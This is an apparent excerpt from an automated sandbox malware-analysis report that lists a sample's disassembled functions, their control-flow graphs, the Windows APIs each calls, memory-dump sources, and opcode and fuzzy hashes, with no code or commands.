                                                                                          • Opcode Fuzzy Hash: 5cffaed401f2d7c0a5419ee78d91533554c0047812aa5848b5d8e2a60cb4ec4a
                                                                                          • Instruction Fuzzy Hash: 13D1E6B1B042558FCB01DF58C890AAEBBF3EF89314B28C96AE555DB752D630DD41CBA0
                                                                                          Function 00D3A832 Relevance: 6.1, APIs: 4, Instructions: 130threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 239 d3a832-d3a8cf GetCurrentProcess 243 d3a8d1-d3a8d7 239->243 244 d3a8d8-d3a90c GetCurrentThread 239->244 243->244 245 d3a915-d3a949 GetCurrentProcess 244->245 246 d3a90e-d3a914 244->246 248 d3a952-d3a96d call d3ae22 245->248 249 d3a94b-d3a951 245->249 246->245 252 d3a973-d3a9a2 GetCurrentThreadId 248->252 249->248 253 d3a9a4-d3a9aa 252->253 254 d3a9ab-d3aa0d 252->254 253->254
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00D3A8BE
                                                                                          • GetCurrentThread.KERNEL32 ref: 00D3A8FB
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00D3A938
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D3A991
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: ee01de01a35826d6c622b0abe442cad5a119dd49017bc64f6e77e144bc79225a
                                                                                          • Instruction ID: 1784593ce114d8d306709746e6236d705c8042e2194c49e6a22b7d92bd063ec8
                                                                                          • Opcode Fuzzy Hash: ee01de01a35826d6c622b0abe442cad5a119dd49017bc64f6e77e144bc79225a
                                                                                          • Instruction Fuzzy Hash: 2C5166B1D103098FDB04CFAAD549B9EBBF5EF88304F248459E449A7360D778A985CF26
                                                                                          Function 00D3A840 Relevance: 6.1, APIs: 4, Instructions: 128threadCOMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 261 d3a840-d3a8cf GetCurrentProcess 265 d3a8d1-d3a8d7 261->265 266 d3a8d8-d3a90c GetCurrentThread 261->266 265->266 267 d3a915-d3a949 GetCurrentProcess 266->267 268 d3a90e-d3a914 266->268 270 d3a952-d3a96d call d3ae22 267->270 271 d3a94b-d3a951 267->271 268->267 274 d3a973-d3a9a2 GetCurrentThreadId 270->274 271->270 275 d3a9a4-d3a9aa 274->275 276 d3a9ab-d3aa0d 274->276 275->276
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00D3A8BE
                                                                                          • GetCurrentThread.KERNEL32 ref: 00D3A8FB
                                                                                          • GetCurrentProcess.KERNEL32 ref: 00D3A938
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00D3A991
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Current$ProcessThread
                                                                                          • String ID:
                                                                                          • API String ID: 2063062207-0
                                                                                          • Opcode ID: fec690931517f7a1cc89963d428ede9c85cf49c3f008f990425c98401c85ae33
                                                                                          • Instruction ID: 28a7b3d3470039a6e5b8f9fc1467be3d48fd691572cc44885abea53369d205c6
                                                                                          • Opcode Fuzzy Hash: fec690931517f7a1cc89963d428ede9c85cf49c3f008f990425c98401c85ae33
                                                                                          • Instruction Fuzzy Hash: 365164B1D003498FDB04CFAAD548B9EBBF5EB88304F248459E449A7360DB74A985CF66
                                                                                          Function 06E71D30 Relevance: 5.2, Strings: 4, Instructions: 171COMMON
                                                                                          Download Yara Rule

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 283 6e71d30-6e71d5e 284 6e71d60 283->284 285 6e71d6a-6e71d8b 283->285 284->285 289 6e71d91-6e71d95 285->289 290 6e71f7a-6e71f9f 285->290 291 6e71d97-6e71d9b 289->291 292 6e71da1-6e71de7 289->292 293 6e71fa6-6e71fda 290->293 291->292 291->293 306 6e71de9-6e71e21 292->306 307 6e71e28-6e71e3e 292->307 306->307 310 6e71e40 307->310 311 6e71e48-6e71e61 307->311 310->311 315 6e71e63-6e71e91 311->315 316 6e71ebf-6e71ef2 311->316 323 6e71e96-6e71ea2 315->323 324 6e71f6d-6e71f77 316->324 323->324 326 6e71ea8-6e71eba 323->326 326->324
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (aq$(aq$xaq$xaq
                                                                                          • API String ID: 0-3564754046
                                                                                          • Opcode ID: 6de2b42b812b5fe1eaadc7e10da960cd7673813398d2e8daa66c05062620a2ca
                                                                                          • Instruction ID: de9e49d21cc37a6de0de1a476dbfe2b957308abc48c598a85502068e33d4d06a
                                                                                          • Opcode Fuzzy Hash: 6de2b42b812b5fe1eaadc7e10da960cd7673813398d2e8daa66c05062620a2ca
                                                                                          • Instruction Fuzzy Hash: D151A3307002059FDB59DF68D850BAE77A2EFC4314F248969E9069B395CF75EC42CB90
                                                                                          Function 06D0777F Relevance: 1.7, APIs: 1, Instructions: 162libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 4d08a575ddb566c5dbeea7e213a66a3425158c1017223f43007f0e1596c5813e
                                                                                          • Instruction ID: 10225530e8c1e136edd30514c2b226266276287a92e3eebe1039ef558a93e7c3
                                                                                          • Opcode Fuzzy Hash: 4d08a575ddb566c5dbeea7e213a66a3425158c1017223f43007f0e1596c5813e
                                                                                          • Instruction Fuzzy Hash: 7F51C271E003598FEB54DFA9C8457AEBBF5EF89310F14852AD805EB380DB74A846CB91
                                                                                          Function 06E71B3C Relevance: 1.6, Strings: 1, Instructions: 362COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: xaq
                                                                                          • API String ID: 0-793007810
                                                                                          • Opcode ID: e71a4c664978be4f0e1a56182bd23ccef86bbdc21d7103f2b1c624eafa4bbd1b
                                                                                          • Instruction ID: 90ca2fcce6cbbf319c5699776f8b172ee097a685edf374f74c311c301bf0a012
                                                                                          • Opcode Fuzzy Hash: e71a4c664978be4f0e1a56182bd23ccef86bbdc21d7103f2b1c624eafa4bbd1b
                                                                                          • Instruction Fuzzy Hash: D741D4717003058FDB15DF28D850BAE7BA2EF89314F18856DE95A8B7A5CB76EC42CB40
                                                                                          Function 06D047FC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Process32First.KERNEL32(?,?), ref: 06D048EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: FirstProcess32
                                                                                          • String ID:
                                                                                          • API String ID: 2623510744-0
                                                                                          • Opcode ID: 1525ad2b2300473fe4cc66d23a078266261446b66fadfb59cfa4893c85ad0848
                                                                                          • Instruction ID: 5a40e9277e875693d122848453d7e4eaa1dcdd43680305db01e2bb3c71f41830
                                                                                          • Opcode Fuzzy Hash: 1525ad2b2300473fe4cc66d23a078266261446b66fadfb59cfa4893c85ad0848
                                                                                          • Instruction Fuzzy Hash: A741E3B0D002289FEB64CF69C985BD9BBB4AF49304F9080E9D50CA7241DB756A89CF91
                                                                                          Function 06D03CC4 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Process32First.KERNEL32(?,?), ref: 06D048EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: FirstProcess32
                                                                                          • String ID:
                                                                                          • API String ID: 2623510744-0
                                                                                          • Opcode ID: 5fd0c50c4d06c40fc1672d792cbceb2b7b80f88ea8f833e7e53596be77a95381
                                                                                          • Instruction ID: a82c6f38603d0110c70b406182761824c8decd29761e8a296f16a8e782fbcb7f
                                                                                          • Opcode Fuzzy Hash: 5fd0c50c4d06c40fc1672d792cbceb2b7b80f88ea8f833e7e53596be77a95381
                                                                                          • Instruction Fuzzy Hash: E341D4B0D04229DFEBA0CF69C985BD9BBF4AB49304F5080E9D50CA7241DB746A89CF91
                                                                                          Function 06D03CB8 Relevance: 1.6, APIs: 1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • Process32First.KERNEL32(?,?), ref: 06D048EE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: FirstProcess32
                                                                                          • String ID:
                                                                                          • API String ID: 2623510744-0
                                                                                          • Opcode ID: 594dd879f0ba23dcf5a3c6ad325e7fc26194f803d7593efb62c768a8d72502c1
                                                                                          • Instruction ID: 48a69e0dcd1aed82319672ef5985087fba0e10b34d8d2abf94af80d53645b373
                                                                                          • Opcode Fuzzy Hash: 594dd879f0ba23dcf5a3c6ad325e7fc26194f803d7593efb62c768a8d72502c1
                                                                                          • Instruction Fuzzy Hash: 6641F4B0D04228DFEB60CF69C984BDDBBF4AB49304F5080EAD50CA7240DB706A89CF91
                                                                                          Function 06D07838 Relevance: 1.6, APIs: 1, Instructions: 91libraryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: LibraryLoad
                                                                                          • String ID:
                                                                                          • API String ID: 1029625771-0
                                                                                          • Opcode ID: 20ffcc96517572ffa934ed0b6d409b5979212623e278988fb241b1a85e10c0b7
                                                                                          • Instruction ID: 109d87af4e5691a22ca6570eeb67f10d29c82da5e25517e02285bfd34ca7d340
                                                                                          • Opcode Fuzzy Hash: 20ffcc96517572ffa934ed0b6d409b5979212623e278988fb241b1a85e10c0b7
                                                                                          • Instruction Fuzzy Hash: 533145B0D103599FEB50DFA9D88579EBBF1BF48310F14862AE815AB380D774A845CF92
                                                                                          Function 00D3AE90 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D3AF17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: b00d5cd665c5efc43ccb68e5c5827ef1bcf8a7c92e7ae1446e34348206730ad5
                                                                                          • Instruction ID: 2c8be16e3ea1afbfbe7fa9f8ab733beffb6b911d585a919a28accab71cd86d35
                                                                                          • Opcode Fuzzy Hash: b00d5cd665c5efc43ccb68e5c5827ef1bcf8a7c92e7ae1446e34348206730ad5
                                                                                          • Instruction Fuzzy Hash: 6621E2B5D00209AFDB10CFAAD884ADEBBF8EF48310F14841AE918A3310C374A954CFA5
                                                                                          Function 00D3AE88 Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00D3AF17
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: DuplicateHandle
                                                                                          • String ID:
                                                                                          • API String ID: 3793708945-0
                                                                                          • Opcode ID: d4a4719cf639b869f759d3a9d994a8b948621fb847c0f05de8172b0d39daade2
                                                                                          • Instruction ID: f53250ebe1a06672931a4059b434b84d8b4bd8f5560d91f69db80d7ef62ee255
                                                                                          • Opcode Fuzzy Hash: d4a4719cf639b869f759d3a9d994a8b948621fb847c0f05de8172b0d39daade2
                                                                                          • Instruction Fuzzy Hash: 3C21DFB5D002099FDB10CFA9D984ADEBBF4EF48310F14841AE959A3310C374A954CFA5
                                                                                          Function 00D38838 Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 00D388AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardLayout
                                                                                          • String ID:
                                                                                          • API String ID: 194098044-0
                                                                                          • Opcode ID: a9579fd8d844d06688b8cae61156be9ac8f1ac7187372871873b048f0f80c74f
                                                                                          • Instruction ID: 3244e02d7d7f2d0baa96af2ab38e265123e6033612ad4fe9d7ac7d761c22ac06
                                                                                          • Opcode Fuzzy Hash: a9579fd8d844d06688b8cae61156be9ac8f1ac7187372871873b048f0f80c74f
                                                                                          • Instruction Fuzzy Hash: 68115675C013498FDB10DFAAE84A79EBBF8EB49314F10841AE415A7340D739A944CFA5
                                                                                          Function 06D04760 Relevance: 1.5, APIs: 1, Instructions: 48processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 06D047CA
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2262617966.0000000006D00000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D00000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d00000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateSnapshotToolhelp32
                                                                                          • String ID:
                                                                                          • API String ID: 3332741929-0
                                                                                          • Opcode ID: 1e17697621784e16549b3e106130853cff652884680827e02231351bba59d414
                                                                                          • Instruction ID: a07e4d65b8a7627a1ee568ce890b910b27916f366d03d6211c5aaf560b115322
                                                                                          • Opcode Fuzzy Hash: 1e17697621784e16549b3e106130853cff652884680827e02231351bba59d414
                                                                                          • Instruction Fuzzy Hash: C01125B5C002499FCB20DF9AD889BDEBFF8EB89310F208419D518A3340D3746944CFA5
                                                                                          Function 00D38848 Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetKeyboardLayout.USER32(00000000), ref: 00D388AF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: KeyboardLayout
                                                                                          • String ID:
                                                                                          • API String ID: 194098044-0
                                                                                          • Opcode ID: b483d252c0e591923216a1bae3835d1e13a83b7c7ac7bd6fcf39e0483998f6fe
                                                                                          • Instruction ID: 3bb9944aec3aa325d1959966d8e2fef7faa0411df74d82ef1b8c3346c6713dc1
                                                                                          • Opcode Fuzzy Hash: b483d252c0e591923216a1bae3835d1e13a83b7c7ac7bd6fcf39e0483998f6fe
                                                                                          • Instruction Fuzzy Hash: 261125B4D003498FDB10DFAAE44979EBFF8EB48310F10842AE419A7340C779A944CFA5
                                                                                          Function 00D3AA78 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OleInitialize.OLE32(00000000), ref: 00D3B4DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 5926dd35f74819b5818f7e055109141493a0800402778968a300402964969e1f
                                                                                          • Instruction ID: 3a9a9b53ef4673e9e0c7a40696db3ed0c04811266c0262edb4ac5d1ef3081deb
                                                                                          • Opcode Fuzzy Hash: 5926dd35f74819b5818f7e055109141493a0800402778968a300402964969e1f
                                                                                          • Instruction Fuzzy Hash: 4F1103B1C003498FCB20DF9AD449B9EBBF8EB48324F20845AD519A7301D375A944CFA5
                                                                                          Function 00D3B480 Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OleInitialize.OLE32(00000000), ref: 00D3B4DD
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249644398.0000000000D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D30000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_d30000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID: Initialize
                                                                                          • String ID:
                                                                                          • API String ID: 2538663250-0
                                                                                          • Opcode ID: 4ede1c983fbbe0d26127ea9a6fa5ddfd4e7a8322b22050da914b7c402de77d7e
                                                                                          • Instruction ID: d135b244167dd170e5b77f07f6233956d4618c08033254b391e2bc79e997b32c
                                                                                          • Opcode Fuzzy Hash: 4ede1c983fbbe0d26127ea9a6fa5ddfd4e7a8322b22050da914b7c402de77d7e
                                                                                          • Instruction Fuzzy Hash: B711F2B18003498FCB10DF9AD445B8EBBF8EB48324F24845AD519A7700C374A944CFA5
                                                                                          Function 06E713B0 Relevance: 1.4, Strings: 1, Instructions: 168COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Te]q
                                                                                          • API String ID: 0-52440209
                                                                                          • Opcode ID: 3de50fa33618a9d9e10bdb50a2c857d99774160930695aeda2ff895c1a0e0bfe
                                                                                          • Instruction ID: 0c7224741975bba6a5fb8e4c3a83637bd498cf5eec35c627467c2a4339b7d99c
                                                                                          • Opcode Fuzzy Hash: 3de50fa33618a9d9e10bdb50a2c857d99774160930695aeda2ff895c1a0e0bfe
                                                                                          • Instruction Fuzzy Hash: 52615875A103149FCB19DFA8D884AADBBF2FF89310F154169E401AB3A1CB30EC45CBA1
                                                                                          Function 06E713A0 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Te]q
                                                                                          • API String ID: 0-52440209
                                                                                          • Opcode ID: 2dc87179150cd0dfdf36fa419578a3f50933f1bab9a31ebe657fceb051fae68d
                                                                                          • Instruction ID: 082b7b154628274be717a24a4b6331604eff9de491b14bb7728e3b73c201d5f3
                                                                                          • Opcode Fuzzy Hash: 2dc87179150cd0dfdf36fa419578a3f50933f1bab9a31ebe657fceb051fae68d
                                                                                          • Instruction Fuzzy Hash: 23515A71B103149FCB19DFA8E885AADBBB2FF89700F154069E401AB3A1DB70ED45CB91
                                                                                          Function 06E71D2F Relevance: 1.4, Strings: 1, Instructions: 126COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: xaq
                                                                                          • API String ID: 0-793007810
                                                                                          • Opcode ID: cbeb039de404e34abc2b37095049fa33618681a0313d39abb692addc66390211
                                                                                          • Instruction ID: 8b2152dc43b8c1f24047311ea740842e906c0b4abddc6a28ec08ca5e12ddf841
                                                                                          • Opcode Fuzzy Hash: cbeb039de404e34abc2b37095049fa33618681a0313d39abb692addc66390211
                                                                                          • Instruction Fuzzy Hash: EA41B1307003059FDB15DF68D854BAE77A2EF88314F28856CE91A9B7A5CB75EC42CB40
                                                                                          Function 06E717D4 Relevance: .1, Instructions: 86COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 64d283c401cf16b308d9d89dc5a94bab4e53fa50424e9890127678eaf86c35f9
                                                                                          • Instruction ID: a27943a4d25217da83792e83563d2ee1212b18448d701de06414827e08446b2c
                                                                                          • Opcode Fuzzy Hash: 64d283c401cf16b308d9d89dc5a94bab4e53fa50424e9890127678eaf86c35f9
                                                                                          • Instruction Fuzzy Hash: 393157B0D003499FDB14DFA9C980ADEBFF5AF48314F288429E959AB350CB349946CF91
                                                                                          Function 06E717E0 Relevance: .1, Instructions: 83COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 46088146968612121336d41a99d94ed8dc77f1e02afee70da6b8c6b2d1697153
                                                                                          • Instruction ID: 21fb5020fae969709a6f14db8e784d30090992388284359b12b4faf03620b5d2
                                                                                          • Opcode Fuzzy Hash: 46088146968612121336d41a99d94ed8dc77f1e02afee70da6b8c6b2d1697153
                                                                                          • Instruction Fuzzy Hash: C93118B0D003499FDB14DFAAC584ADEBFF5AF48314F288429E519AB350DB349945CFA1
                                                                                          Function 06E7201A Relevance: .1, Instructions: 79COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 8e0e8c84330ff3b9734ba95c5cce82fe7d48c8908d271cc08f9226ff20c4e8cb
                                                                                          • Instruction ID: f8dd483fd5b1e30dfa1022556c32320bb3e30b804b3f756d6c64120e0b32dee9
                                                                                          • Opcode Fuzzy Hash: 8e0e8c84330ff3b9734ba95c5cce82fe7d48c8908d271cc08f9226ff20c4e8cb
                                                                                          • Instruction Fuzzy Hash: 4831FA74B102048FCB44EF78D895A9EB7B2FF88304F119469E515AB365DA75AC02CFA1
                                                                                          Function 00C2D758 Relevance: .1, Instructions: 75COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249279490.0000000000C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C2D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c2d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f08dd8485d78c56c56f12fcfd1ef4f4edd6f3caed59cbc77ea8ddcde74bf7e9d
                                                                                          • Instruction ID: b0c3c5dde9388acc23fd1299b7c6d76791e10aa90dfdb2e5a24df253e3ff3199
                                                                                          • Opcode Fuzzy Hash: f08dd8485d78c56c56f12fcfd1ef4f4edd6f3caed59cbc77ea8ddcde74bf7e9d
                                                                                          • Instruction Fuzzy Hash: B32145B1504240DFDB00DF14E9C0B26BF65FBA4714F34C569E80A0B64AC33AD816C6A1
                                                                                          Function 06E72028 Relevance: .1, Instructions: 74COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6e70000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 99f1bf82f676c1832294c114bf5c9bf9e6a84455764bb3c42d0b62ec96bb58fe
                                                                                          • Instruction ID: 2503eb9e3d65394d2638645b3d75dcf9192a6868e36234668e02c4b4abf6e06c
                                                                                          • Opcode Fuzzy Hash: 99f1bf82f676c1832294c114bf5c9bf9e6a84455764bb3c42d0b62ec96bb58fe
                                                                                          • Instruction Fuzzy Hash: AE310A74B002048FCB44EF78C894A9EB7B2FF88304F119468E516AB365DA75AC02CFA1
                                                                                          Function 00C3D1CC Relevance: .1, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2249314007.0000000000C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C3D000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_c3d000_zyEDYRU0jw.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 78059b109ca3fbcc0fad9c9c000143713262849eebd3bee9e698332303843ebf
                                                                                          • Instruction ID: de72c106c2a7c860302a2838108a534ab8620ed6d566797bddb76340ffadd98f
                                                                                          • Opcode Fuzzy Hash: 78059b109ca3fbcc0fad9c9c000143713262849eebd3bee9e698332303843ebf
                                                                                          • Instruction Fuzzy Hash: 872104B5914204EFDB04DF14E5C0B26BBA5FB84314F24C96DE80A4B286C777DC56CA61
                                                                                          Function 06E70858 Relevance: .1, Instructions: 66COMMON
                                                                                          Download Yara Rule
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2263108937.0000000006E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06E70000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
